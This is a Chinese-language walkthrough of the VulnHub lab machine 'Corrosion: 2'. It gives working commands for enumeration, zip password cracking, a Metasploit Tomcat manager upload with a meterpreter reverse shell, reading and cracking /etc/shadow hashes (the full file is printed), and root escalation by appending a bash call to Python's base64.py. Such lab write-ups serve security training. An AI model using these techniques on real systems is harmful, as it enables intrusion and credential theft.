CORROSION: 2

靶机描述

靶机地址：https://www.vulnhub.com/entry/corrosion-2,745/

Description

Difficulty: Medium
Hint: Enumeration is key.

信息搜集

利用arp-scan -l命令扫描靶机IP

1. arp-scan -l

复制代码

端口扫描

1. nmap -sS -sV -A -p- 192.168.75.167

复制代码

开放22、80和8080端口
80端口是一个apache的默认页面，8080是一个tomcat的默认页面

目录扫描

对tomcat做目录爆破，发现一个backup.zip文件

1. dirsearch -u http://192.168.75.167:8080

复制代码

下载backup.zip

1. wget http://192.168.75.167:8080/backup.zip

复制代码

解压发现要密码，用fcrackzip进行爆破

1. fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

复制代码

得到密码@administrator_hi5，再次解压

检察tomcat-users.xml文件，得到后台管理员用户和密码admin/melehifokivai

1. cat tomcat-users.xml

复制代码

尝试登录

漏洞利用

用metasploit对tomcat进行攻击

1. msfconsole
2. search tomcat
3. use exploit/multi/http/tomcat_mgr_upload
4. show options
5. set rhosts 192.168.75.167
6. set rport 8080
7. set httpusername admin
8. set httppassword melehifokivai
9. set payload payload/java/meterpreter/reverse_tcp
10. exploit

复制代码

乐成获取shell

使用python切换交互式shell

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

复制代码

此时进入的用户是tomcat身份，在/home目录下发现jaye和randy用户，jaye没有可读权限，但是randy目录可读

切用户su jaye，密码melehifokivai可用

使用python切换交互式shell

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

复制代码

在/jaye/Files目录下发现了look文件，拥有s权限

在GTFOBins中查找look命令，发现只能越权读取文件

读取/etc/shadow文件并复制到本地使用john进行爆破

1. root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
2. daemon:*:18858:0:99999:7:::
3. bin:*:18858:0:99999:7:::
4. sys:*:18858:0:99999:7:::
5. sync:*:18858:0:99999:7:::
6. games:*:18858:0:99999:7:::
7. man:*:18858:0:99999:7:::
8. lp:*:18858:0:99999:7:::
9. mail:*:18858:0:99999:7:::
10. news:*:18858:0:99999:7:::
11. uucp:*:18858:0:99999:7:::
12. proxy:*:18858:0:99999:7:::
13. backup:*:18858:0:99999:7:::
14. list:*:18858:0:99999:7:::
15. irc:*:18858:0:99999:7:::
16. gnats:*:18858:0:99999:7:::
17. nobody:*:18858:0:99999:7:::
18. systemd-network:*:18858:0:99999:7:::
19. systemd-resolve:*:18858:0:99999:7:::
20. systemd-timesync:*:18858:0:99999:7:::
21. messagebus:*:18858:0:99999:7:::
22. syslog:*:18858:0:99999:7:::
23. _apt:*:18858:0:99999:7:::
24. tss:*:18858:0:99999:7:::
25. uuidd:*:18858:0:99999:7:::
26. tcpdump:*:18858:0:99999:7:::
27. avahi-autoipd:*:18858:0:99999:7:::
28. usbmux:*:18858:0:99999:7:::
29. rtkit:*:18858:0:99999:7:::
30. dnsmasq:*:18858:0:99999:7:::
31. cups-pk-helper:*:18858:0:99999:7:::
32. speech-dispatcher:!:18858:0:99999:7:::
33. avahi:*:18858:0:99999:7:::
34. kernoops:*:18858:0:99999:7:::
35. saned:*:18858:0:99999:7:::
36. nm-openvpn:*:18858:0:99999:7:::
37. hplip:*:18858:0:99999:7:::
38. whoopsie:*:18858:0:99999:7:::
39. colord:*:18858:0:99999:7:::
40. geoclue:*:18858:0:99999:7:::
41. pulse:*:18858:0:99999:7:::
42. gnome-initial-setup:*:18858:0:99999:7:::
43. gdm:*:18858:0:99999:7:::
44. sssd:*:18858:0:99999:7:::
45. randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
46. systemd-coredump:!!:18886::::::
47. tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
48. sshd:*:18887:0:99999:7:::
49. jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::

复制代码

爆破了很久，终于是得到了另一个用户randy的密码07051986randy

1. john -w=/usr/share/wordlists/rockyou.txt shadow

复制代码

耗时两个小时

ssh登录到randy用户，使用sudo -l列出命令

发现可以使用python3.8实行randombase64.py，但是根据前面note.txt文件内容发现只有root用户可以修改此文件，但是文件导入了base64模块

找到base64.py存放的位置

1. find / -name base64.py 2>/dev/null

复制代码

写入/bin/bash语句

1. echo "import os;os.system('/bin/bash')" >> /usr/lib/python3.8/base64.py

复制代码

最后sudo实行randombase64.py，拿到root权限

1. sudo /usr/bin/python3.8 /home/randy/randombase64.py

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。